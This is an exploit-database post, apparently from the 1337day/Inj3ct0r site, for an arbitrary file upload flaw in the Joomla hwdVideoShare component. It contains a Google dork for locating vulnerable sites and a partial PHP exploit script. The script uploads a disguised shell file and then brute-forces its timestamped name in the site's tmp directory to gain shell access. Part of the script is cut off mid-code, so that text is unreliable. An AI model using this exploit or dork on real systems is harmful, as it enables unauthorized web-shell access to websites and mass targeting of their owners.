1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm Sammy FORGIT member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ################################################## # Description : Joomla Components - hwdVideoShare Arbitrary File Upload Vulnerability # Version : r805 # link : http://hwdmediashare.co.uk/hwdvideoshare # Software : http://joomlacode.org/gf/download/docmanfileversion/1389/68506/UNZIP_FIRST_hwdVideoShare_SVN-r805.zip # Date : 16-06-2012 # Google Dork : inurl:/components/com_hwdvideoshare # Site : 1337day.com Inj3ct0r Exploit Database # Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr ################################################## Exploit : depends fonction date() Same country, it's ideal.Attention at the time on the target and on the pc which attack. PostShell.php "@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; echo "
"; $i = 0; for ($i=1;$i<9999;$i++) { $n = 4; $num = str_pad((int) $i,$n,"0",STR_PAD_LEFT); $filename = date('YmdH').$num.$uploadfile; $url = "http://www.exemple.com/tmp/".$filename; $c = curl_init("$url"); $postResult2 = curl_exec($c); $info = curl_getinfo($c); $httpcode = $info['http_code']; if($httpcode == 200){ echo $url; curl_close($c); exit; } } ?> Shell Access : PostShell.php output lo.php.vob # Site : 1337day.com Inj3ct0r Exploit Database